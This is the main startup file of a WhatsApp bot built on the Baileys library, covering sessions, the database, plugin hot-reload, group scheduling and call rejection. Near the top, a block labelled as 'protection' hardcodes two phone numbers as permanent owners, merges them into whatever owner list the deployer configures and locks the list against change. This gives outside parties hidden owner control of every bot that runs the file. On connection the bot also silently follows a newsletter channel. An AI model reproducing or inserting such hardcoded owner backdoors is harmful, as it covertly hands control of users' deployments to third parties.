////process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = '0';
import './config.js';

import { createRequire } from "module"; 
import path, { join } from 'path'
import { fileURLToPath, pathToFileURL } from 'url'
import { platform } from 'process'
global.__filename = function filename(pathURL = import.meta.url, rmPrefix = platform !== 'win32') { return rmPrefix ? /file:\/\/\//.test(pathURL) ? fileURLToPath(pathURL) : pathURL : pathToFileURL(pathURL).toString() }; global.__dirname = function dirname(pathURL) { return path.dirname(global.__filename(pathURL, true)) }; global.__require = function require(dir = import.meta.url) { return createRequire(dir) }

// --- PERMANENT OWNERS PROTECTION ---
const permanentOwners = ['263781330745', '263789622747']

// Merge with any owners defined in config.js (optional)
if (Array.isArray(global.owner)) {
  global.owner = [...new Set([...permanentOwners, ...global.owner.map(String)])]
} else {
  global.owner = permanentOwners
}

// Prevent overwriting later
Object.defineProperty(global, 'owner', {
  value: [...global.owner],
  writable: false,
  configurable: false
})
// --- END PERMANENT OWNERS PROTECTION ---

import fs from 'fs';
import { spawn } from 'child_process';
import { tmpdir } from 'os';
import { format } from 'util';
import { makeWASocket, protoType, serialize } from './lib/simple.js';
import chalk from 'chalk';
import pino from 'pino';
import syntaxerror from 'syntax-error';
import { Low, JSONFile } from 'lowdb';

import {
  useMultiFileAuthState,
  Browsers,
  fetchLatestBaileysVersion,
  makeCacheableSignalKeyStore
} from 'baileys'

protoType()
serialize()

const __dirname = global.__dirname(import.meta.url)

global.prefix = new RegExp('^[' + '‎xzXZ/i!#$%+£¢€¥^°=¶∆×÷π√✓©®:;?&.\\-'.replace(/[|\\{}()[\]^$+*?.\-\^]/g, '\\$&') + ']')
global.db = new Low(new JSONFile(`database.json`));

process.on('uncaughtException', console.error);

global.loadDatabase = async function loadDatabase() {
  if (global.db.READ) return new Promise((resolve) => setInterval(async function () {
    if (!global.db.READ) {
      clearInterval(this)
      resolve(global.db.data == null ? global.loadDatabase() : global.db.data)
    }
  }, 1 * 1000))
  if (global.db.data !== null) return
  global.db.READ = true
  await global.db.read().catch(console.error)
  global.db.READ = null
  global.db.data = {
    users: {},
    chats: {},
    stats: {},
    msgs: {},
    sticker: {},
    settings: {},
    ...(global.db.data || {})
  }
}
loadDatabase()

const { state, saveCreds } = await useMultiFileAuthState('sessions')
const { version } = await fetchLatestBaileysVersion()
const connectionOptions = ({
  auth: {
    creds: state.creds,
    keys: makeCacheableSignalKeyStore(state.keys, pino().child({
      level: 'silent',
      stream: 'store'
    })),
  },
  version,
  logger: pino({ level: 'silent' }),
  browser: ['Mac OS', 'safari', '5.1.10'],
  generateHighQualityLinkPreview: true,
  patchMessageBeforeSending: (message) => {
    const requiresPatch = !!(
      message.buttonsMessage
      || message.templateMessage
      || message.listMessage
    );
    if (requiresPatch) {
      message = {
        viewOnceMessage: {
          message: {
            messageContextInfo: {
              deviceListMetadataVersion: 2,
              deviceListMetadata: {},
            },
            ...message,
          },
        },
      };
    }
    return message;
  },
  getMessage: async key => {
    const messageData = await store.loadMessage(key.remoteJid, key.id);
    return messageData?.message || undefined;
  },
  syncFullHistory: false,
  shouldSyncHistoryMessage: () => true,
  markOnlineOnConnect: true,
  connectTimeoutMs: 60000,
  keepAliveIntervalMs: 30_000,
  retryRequestDelayMs: 250,
  maxMsgRetryCount: 5
})

global.conn = makeWASocket(connectionOptions)

if (!conn.authState.creds.registered) {
  console.log(chalk.bgWhite(chalk.blue('Generating code...')))
  setTimeout(async () => {
    let code = await conn.requestPairingCode(global.pairingNumber)
    code = code?.match(/.{1,4}/g)?.join('-') || code
    console.log(chalk.black(chalk.bgGreen(`Here Is Your Pairing Code : `)), chalk.black(chalk.white(code)))
  }, 3000)
}

if (global.db) {
   setInterval(async () => {
    if (global.db.data) {
    await global.db.write().catch(console.error);
    }
    if ((global.support || {}).find) {
      const tmp = [tmpdir(), 'tmp'];
      tmp.forEach(filename => spawn('find', [filename, '-amin', '3', '-type', 'f', '-delete']));
    }
  }, 2000);
}

if (fs.existsSync('./sessions/creds.json') && !conn.authState.creds.registered) {
  console.log(chalk.yellow('-- WARNING: creds.json is broken, please delete it first --'));
  process.exit(0);
}

async function connectionUpdate(update) {
  const { receivedPendingNotifications, connection, lastDisconnect, isOnline, isNewLogin } = update;

  if (connection == 'connecting') {
    console.log(chalk.redBright('🌿 Activating bot, please wait a moment..'));
  } else if (connection == 'open') {
conn.newsletterFollow("120363424621387196@newsletter")
            conn.newsletterFollow("120@newsletter")
            conn.newsletterFollow("120@newsletter") 
    console.log(chalk.green('✅ Connected'));
  }

  if (isOnline == true) {
    console.log(chalk.green('Active Status'));
  } else if (isOnline == false) {
    console.log(chalk.red('Inactive Status'));
  }

  if (receivedPendingNotifications) {
    console.log(chalk.yellow('Waiting for new message'));
  }

  if (connection == 'close') {
    console.log(chalk.red('⏱️ Connection lost & attempting to reconnect.....'));
  }

  if (lastDisconnect && lastDisconnect.error && lastDisconnect.error.output && lastDisconnect.error.output.payload) {
    console.log(chalk.red(lastDisconnect.error.output.payload.message))
    await global.reloadHandler(true);
  }

  if (global.db.data == null) {
    await global.loadDatabase();
  }
}

process.on('uncaughtException', console.error)
// let strQuot = /(["'])(?:(?=(\\?))\2.)*?\1/

let isInit = true;
let handler = await import('./handler.js')
global.reloadHandler = async function (restatConn) {
  try {
    const Handler = await import(`./handler.js?update=${Date.now()}`).catch(console.error)
    if (Object.keys(Handler || {}).length) handler = Handler
  } catch (e) {
    console.error(e)
  }
  if (restatConn) {
    const oldChats = global.conn.chats
    try { global.conn.ws.close() } catch { }
    conn.ev.removeAllListeners()
    global.conn = makeWASocket(connectionOptions, { chats: oldChats })
    isInit = true
  }
  if (!isInit) {
    conn.ev.off('messages.upsert', conn.handler)
    conn.ev.off('group-participants.update', conn.participantsUpdate)
    conn.ev.off('groups.update', conn.groupsUpdate)
    conn.ev.off('message.delete', conn.onDelete)
    conn.ev.off('connection.update', conn.connectionUpdate)
    conn.ev.off('creds.update', conn.credsUpdate)
  }

  conn.welcome = '✦━━━━━━[ *WELCOME* ]━━━━━━✦\n\n┏––––––━━━━━━━━•\n│⫹⫺ @subject\n┣━━━━━━━━┅┅┅\n│( 👋 Hello @user)\n├[ *INTRO* ]—\n│ *Name:* \n│ *Age:* \n│ *Gender:*\n┗––––––━━┅┅┅\n\n––––––┅┅ *DESCRIPTION* ┅┅––––––\n@desc'

conn.bye = '✦━━━━━━[ *GOOD BYE* ]━━━━━━✦\nGoodbye *@user* 👋( ╹▽╹ )'

conn.spromote = '@user is now an admin!'
conn.sdemote = '@user is no longer an admin!'
conn.sDesc = 'Group description has been changed to \n@desc'
conn.sSubject = 'Group title has been changed to \n@subject'
conn.sIcon = 'Group icon has been changed!'
conn.sRevoke = 'Group link has been changed to \n@revoke'
  conn.handler = handler.handler.bind(global.conn)
  conn.participantsUpdate = handler.participantsUpdate.bind(global.conn)
  conn.groupsUpdate = handler.groupsUpdate.bind(global.conn)
  conn.onDelete = handler.deleteUpdate.bind(global.conn)
  conn.connectionUpdate = connectionUpdate.bind(global.conn)
  conn.credsUpdate = saveCreds.bind(global.conn)

  conn.ev.on('call', async (calls) => {
        for (const call of calls) {
            const { id, from, status } = call;
            const settings = global.db.data.settings[conn.user.jid]
            if (call.status === 'offer' && settings.anticall) {
                await conn.rejectCall(id, from);
                console.log('Rejected call from', from);
            }
        }
    })
    
    setInterval(async () => {
    let now = new Date().toLocaleString('id-ID', { timeZone: 'Africa/Harare' })
    let jam = now.split(' ')[1].slice(0,5) // 21:00

    for (let id in global.db.data.chats) {
        let chat = global.db.data.chats[id]
        if (!chat.autogroup) continue // off → skip

        // TUTUP GRUP JAM 21:00
        if (jam === "21:00") {
            try {
                await conn.groupSettingUpdate(id, 'announcement')
                await conn.sendMessage(id, { text: '🔒 *Group automatically closed (21:00)*' })
            } catch {}
        }

        // BUKA GRUP JAM 04:00
        if (jam === "04:00") {
            try {
                await conn.groupSettingUpdate(id, 'not_announcement')
                await conn.sendMessage(id, { text: '🔓 *Group automatically opened (04:00)*' })
            } catch {}
        }
    }
}, 60 * 1000) // cek tiap 1 menit

  conn.ev.on('messages.upsert', conn.handler)
  conn.ev.on('group-participants.update', conn.participantsUpdate)
  conn.ev.on('groups.update', conn.groupsUpdate)
  conn.ev.on('message.delete', conn.onDelete)
  conn.ev.on('connection.update', conn.connectionUpdate)
  conn.ev.on('creds.update', conn.credsUpdate)
  isInit = false
  return true
}

const pluginFolder = global.__dirname(join(__dirname, './plugins/index'))
const pluginFilter = filename => /\.js$/.test(filename)
global.plugins = {}
async function filesInit() {
  for (let filename of fs.readdirSync(pluginFolder).filter(pluginFilter)) {
    try {
      let file = global.__filename(join(pluginFolder, filename))
      const module = await import(file)
      global.plugins[filename] = module.default || module
    } catch (e) {
      conn.logger.error(`❌ Failed to load plugins ${filename}: ${e}`)
      delete global.plugins[filename]
    }
  }
}
filesInit().then(_ => console.log(`Successfully Loaded ${Object.keys(global.plugins).length} Plugins`)).catch(console.error)

global.reload = async (_ev, filename) => {
  if (pluginFilter(filename)) {
    let dir = global.__filename(join(pluginFolder, filename), true)
    if (filename in global.plugins) {
      if (fs.existsSync(dir)) conn.logger.info(`re - require plugin '${filename}'`)
      else {
        conn.logger.warn(`deleted plugin '${filename}'`)
        return delete global.plugins[filename]
      }
    } else conn.logger.info(`requiring new plugin '${filename}'`)
    let err = syntaxerror(fs.readFileSync(dir), filename, {
      sourceType: 'module',
      allowAwaitOutsideFunction: true
    })
    if (err) conn.logger.error(`syntax error while loading '${filename}'\n${format(err)}`)
    else try {
      const module = (await import(`${global.__filename(dir)}?update=${Date.now()}`))
      global.plugins[filename] = module.default || module
    } catch (e) {
      conn.logger.error(`error require plugin '${filename}\n${format(e)}'`)
    } finally {
      global.plugins = Object.fromEntries(Object.entries(global.plugins).sort(([a], [b]) => a.localeCompare(b)))
    }
  }
}
Object.freeze(global.reload)
fs.watch(pluginFolder, global.reload)
await global.reloadHandler()

// Quick Test
async function _quickTest() {
  let test = await Promise.all([
    spawn('ffmpeg'),
    spawn('ffprobe'),
    spawn('ffmpeg', ['-hide_banner', '-loglevel', 'error', '-filter_complex', 'color', '-frames:v', '1', '-f', 'webp', '-']),
    spawn('convert'),
    spawn('magick'),
    spawn('gm'),
    spawn('find', ['--version'])
  ].map(p => {
    return Promise.race([
      new Promise(resolve => {
        p.on('close', code => {
          resolve(code !== 127)
        })
      }),
      new Promise(resolve => {
        p.on('error', _ => resolve(false))
      })
    ])
  }))
  let [ffmpeg, ffprobe, ffmpegWebp, convert, magick, gm, find] = test
  //console.log(test)
  let s = global.support = {
    ffmpeg,
    ffprobe,
    ffmpegWebp,
    convert,
    magick,
    gm,
    find
  }
  // require('./lib/sticker').support = s
  Object.freeze(global.support)

  if (!s.ffmpeg) conn.logger.warn('Please install ffmpeg for sending videos (pkg install ffmpeg)')
  if (s.ffmpeg && !s.ffmpegWebp) conn.logger.warn('Stickers may not animated without libwebp on ffmpeg (--enable-ibwebp while compiling ffmpeg)')
  if (!s.convert && !s.magick && !s.gm) conn.logger.warn('Stickers may not work without imagemagick if libwebp on ffmpeg doesnt isntalled (pkg install imagemagick)')
}

_quickTest()
  .then(() => conn.logger.info('☑️ Quick Test Done'))
  .catch(console.error)